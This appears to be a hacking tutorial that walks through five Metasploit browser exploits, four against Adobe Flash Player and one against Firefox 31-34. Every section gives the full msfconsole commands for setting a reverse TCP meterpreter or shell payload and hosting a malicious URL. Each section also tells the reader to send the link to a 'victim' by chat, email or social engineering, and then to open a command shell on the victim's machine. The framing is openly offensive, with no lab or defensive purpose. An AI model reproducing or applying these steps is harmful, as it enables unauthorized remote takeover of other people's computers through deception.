Hack Remote Windows PC using Adobe Flash Player copy Pixels to ByteArray Integer Overflow

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_copy_pixel_to_byte_array
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set srvhost 192.168.1.16
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set uripath /
msf exploit (adobe_flash_copy_pixel_to_byte_array)>exploit


Now an URL you should give to your victim http://192.168.1.16:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.16:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Hack Remote Windows PC using Adobe Flash Player PCRE Regex Vulnerability

This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_pcre
msf exploit (adobe_flash_pcre)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_pcre)>set lhost 192.168.1.11 (IP of Local Host)
msf exploit (adobe_flash_pcre)>set srvhost 192.168.1.11
msf exploit (adobe_flash_pcre)>set uripath /
msf exploit (adobe_flash_pcre)>exploit


Now an URL you should give to your victim http://192.168.1.11:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.11:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Hack Remote Windows PC using Adobe Flash Player Byte Array with Workers Use after Free

This module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, who can fill the memory and notify the main thread to corrupt the new contents. This module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.

Exploit Targets
Windows 7
Flash 16.0.0.296.

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf exploit (adobe_flash_worker_byte_array_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_worker_byte_array_uaf)>set lhost 192.168.1.11 (IP of Local Host)
msf exploit (adobe_flash_worker_byte_array_uaf)>set srvhost 192.168.1.11
msf exploit (adobe_flash_worker_byte_array_uaf)>set uripath /
msf exploit (adobe_flash_worker_byte_array_uaf)>exploit  


Now an URL you should give to your victim http://192.168.1.11:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.11:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Hack Remote Windows PC using Adobe Flash Player Byte Array Uncompress via ZlibVariant Use after Free

This module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress () a malformed byte stream. This module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.

Exploit Targets
Flash 16.0.0.287

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploitwindows/browser/adobe_flash_uncompress_zlib_uaf
msf exploit (adobe_flash_uncompress_zlib_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_uncompress_zlib_uaf)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (adobe_flash_uncompress_zlib_uaf)>set srvhost 192.168.1.9
msf exploit (adobe_flash_uncompress_zlib_uaf)>set uripath /
msf exploit (adobe_flash_uncompress_zlib_uaf)>exploit  


Now an URL you should give to your victim http://192.168.1.9:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.9:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Hack Remote Windows, Linux, OSX PC using Firefox Proxy Prototype Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets
Firefox 31 to 34
Windows 7
Linux
Solaris
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_proxy_prototype
msf exploit (firefox_proxy_prototype)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_proxy_prototype)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_proxy_prototype)>set srvhost 192.168.1.9
msf exploit (firefox_proxy_prototype)>set uripath /
msf exploit (firefox_proxy_prototype)>exploit


Now an URL you should give to your victim http://192.168.1.9:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.9:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link


Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.